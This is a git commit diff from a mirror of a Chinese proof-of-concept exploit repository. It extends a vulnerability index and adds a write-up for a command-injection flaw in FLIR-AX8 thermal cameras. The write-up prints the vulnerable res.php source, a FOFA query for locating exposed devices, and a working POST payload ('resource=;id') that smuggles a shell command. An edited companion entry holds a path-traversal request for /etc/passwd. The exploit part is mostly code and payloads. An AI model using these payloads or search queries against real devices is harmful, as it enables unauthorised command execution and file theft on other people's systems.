mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
更新漏洞库:网络设备漏洞/
This commit is contained in:
Threekiii
parent
db8033eacb
commit
6819988d68
@ -66,13 +66,16 @@
|
||||
|
||||
* O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740
|
||||
* 一米OA getfile.jsp 任意文件读取漏洞
|
||||
* 万户OA DocumentEdit.jsp SQL注入漏洞
|
||||
* 万户OA download_ftp.jsp 任意文件下载漏洞
|
||||
* 万户OA download_old.jsp 任意文件下载漏洞
|
||||
* 万户OA downloadhttp.jsp 任意文件下载漏洞
|
||||
* 万户OA DownloadServlet 任意文件读取漏洞
|
||||
* 万户OA fileUpload.controller 任意文件上传漏洞
|
||||
* 万户OA OfficeServer.jsp 任意文件上传漏洞
|
||||
* 万户OA showResult.action 后台SQL注入漏洞
|
||||
* 万户OA smartUpload.jsp 任意文件上传漏洞
|
||||
* 万户OA TeleConferenceService XXE注入漏洞
|
||||
* 信呼OA beifenAction.php 后台目录遍历漏洞
|
||||
* 华天动力OA 8000版 workFlowService SQL注入漏洞
|
||||
* 启莱OA CloseMsg.aspx SQL注入漏洞
|
||||
@ -90,6 +93,7 @@
|
||||
* 泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204
|
||||
* 泛微OA E-Cology getSqlData SQL注入漏洞
|
||||
* 泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞
|
||||
* 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
|
||||
* 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202
|
||||
* 泛微OA E-Cology users.data 敏感信息泄漏
|
||||
* 泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞
|
||||
@ -312,6 +316,7 @@
|
||||
* 深信服 行为感知系统 c.php 远程命令执行漏洞
|
||||
* 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
|
||||
* 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
|
||||
* 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
|
||||
* 畅捷CRM get_usedspace.php SQL注入漏洞
|
||||
* 畅捷CRM 后台附件任意文件上传漏洞
|
||||
* 科达 MTS转码服务器 任意文件读取漏洞
|
||||
@ -385,6 +390,7 @@
|
||||
* Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861
|
||||
* Jenkins CI 远程代码执行漏洞 CVE-2017-1000353
|
||||
* Jenkins script 远程命令执行漏洞
|
||||
* muhttpd 任意文件读取漏洞 CVE-2022-31793
|
||||
* Nginx越界读取缓存漏洞 CVE-2017-7529
|
||||
* PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381
|
||||
* Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
|
||||
@ -412,6 +418,7 @@
|
||||
* Linux DirtyPipe权限提升漏洞 CVE-2022-0847
|
||||
* Linux eBPF权限提升漏洞 CVE-2022-23222
|
||||
* Linux kernel权限提升漏洞 CVE-2021-3493
|
||||
* Linux openvswitch权限提升漏洞 CVE-2022-2639
|
||||
* Linux Polkit权限提升漏洞 CVE-2021-4034
|
||||
* Linux sudo权限提升漏洞 CVE-2021-3156
|
||||
* Windows CryptoAPI欺骗漏洞 CVE-2020-0601
|
||||
@ -474,6 +481,7 @@
|
||||
* DVR 登录绕过漏洞 CVE-2018-9995
|
||||
* Finetree 5MP 摄像机 user_pop.php 任意用户添加漏洞 CNVD-2021-42372
|
||||
* FLIR-AX8 download.php 任意文件下载
|
||||
* FLIR-AX8 res.php 后台命令执行漏洞
|
||||
* H3C SecPath下一代防火墙 任意文件下载漏洞
|
||||
* HIKVISION DSIDSIPC 等设备 远程命令执行漏洞 CVE-2021-36260
|
||||
* HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞
|
||||
@ -514,6 +522,7 @@
|
||||
* TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084
|
||||
* TP-Link SR20 远程命令执行
|
||||
* TVT数码科技 NVMS-1000 路径遍历漏洞
|
||||
* Untitled
|
||||
* Wayos AC集中管理系统默认弱口令 CNVD-2021-00876
|
||||
* Wayos 防火墙 后台命令执行漏洞
|
||||
* Wayos 防火墙 账号密码泄露漏洞
|
||||
|
||||
@ -18,6 +18,10 @@ app="FLIR-FLIR-AX8"
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||
|
||||
|
||||
出现漏洞的文件为 **download.php**
|
||||
|
||||
```php
|
||||
@ -174,4 +178,4 @@ else
|
||||
/download.php?file=/etc/passwd
|
||||
```
|
||||
|
||||
|
||||
|
||||
124
网络设备漏洞/FLIR-AX8 res.php 后台命令执行漏洞.md
Normal file
124
网络设备漏洞/FLIR-AX8 res.php 后台命令执行漏洞.md
Normal file
@ -0,0 +1,124 @@
|
||||
# FLIR-AX8 res.php 后台命令执行漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
FLIR-AX8 res.php 文件存在后台命令执行漏洞,攻击者通过默认口令登录后台后获取服务器权限
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
FLIR-AX8
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="FLIR-FLIR-AX8"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||
|
||||
|
||||
出现漏洞的文件为 **res.php**
|
||||
|
||||
```
|
||||
<?php
|
||||
if (isset($_POST["action"])) {
|
||||
switch ($_POST["action"]) {
|
||||
case "get":
|
||||
if(isset($_POST["resource"]))
|
||||
{
|
||||
switch ($_POST["resource"]) {
|
||||
case ".rtp.hflip":
|
||||
if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
|
||||
$result = "false";
|
||||
break;
|
||||
}
|
||||
$result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
|
||||
break;
|
||||
case ".rtp.vflip":
|
||||
if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
|
||||
$result = "false";
|
||||
break;
|
||||
}
|
||||
$result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
|
||||
break;
|
||||
default:
|
||||
$result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
|
||||
}
|
||||
}
|
||||
break;
|
||||
case "set":
|
||||
if(isset($_POST["resource"]) and isset($_POST["value"])) {
|
||||
switch ($_POST["resource"]) {
|
||||
case "rtp.hflip":
|
||||
file_put_contents("/FLIR/system/journal.d/horizontal_flip.cfg", $_POST["value"] === "true" ? "1" : "0");
|
||||
break;
|
||||
case "rtp.vflip":
|
||||
file_put_contents("/FLIR/system/journal.d/vertical_flip.cfg", $_POST["value"] === "true" ? "1" : "0");
|
||||
break;
|
||||
default:
|
||||
$result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rset ".$_POST["resource"]." ".$_POST["value"]));;
|
||||
}
|
||||
}
|
||||
|
||||
break;
|
||||
case "measurement":
|
||||
if (isset($_POST["type"]) && isset($_POST["id"])) {
|
||||
$nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.measureFuncs.".$_POST["type"].".".$_POST["id"]));
|
||||
$lines = explode("\n", $nodeData);
|
||||
foreach($lines as $line)
|
||||
{
|
||||
$resource = preg_split('/\s+/', $line);
|
||||
$value = trim($resource[1], "\"");
|
||||
$result[$resource[0]] = $value;
|
||||
}
|
||||
}
|
||||
break;
|
||||
case "global-parameters":
|
||||
$nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -i .image.sysimg.basicImgData.objectParams"));
|
||||
$lines = explode("\n", $nodeData);
|
||||
foreach($lines as $line)
|
||||
{
|
||||
$resource = preg_split('/\s+/', $line);
|
||||
$result[$resource[0]] = $resource[1];
|
||||
}
|
||||
case "alarm":
|
||||
if(isset($_POST["id"]))
|
||||
{
|
||||
$nodeData = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls .image.sysimg.alarms.measfunc.".$_POST["id"]));
|
||||
$lines = explode("\n", $nodeData);
|
||||
foreach($lines as $line)
|
||||
{
|
||||
$resource = preg_split('/\s+/', $line);
|
||||
$value = trim($resource[1], "\"");
|
||||
$result[$resource[0]] = $value;
|
||||
}
|
||||
}
|
||||
break;
|
||||
case "calibrate":
|
||||
$result = shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/nuc");
|
||||
|
||||
break;
|
||||
case "node":
|
||||
$nodes = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls ".$_POST["resource"]));
|
||||
$result = preg_split("/\s+\n/", $nodes);
|
||||
break;
|
||||
}
|
||||
echo json_encode($result);
|
||||
}
|
||||
?>
|
||||
```
|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
POST /res.php
|
||||
|
||||
action=node&resource=;id
|
||||
```
|
||||
|
||||
|
||||
0
网络设备漏洞/Untitled.md
Normal file
0
网络设备漏洞/Untitled.md
Normal file
Loading…
x
Reference in New Issue
Block a user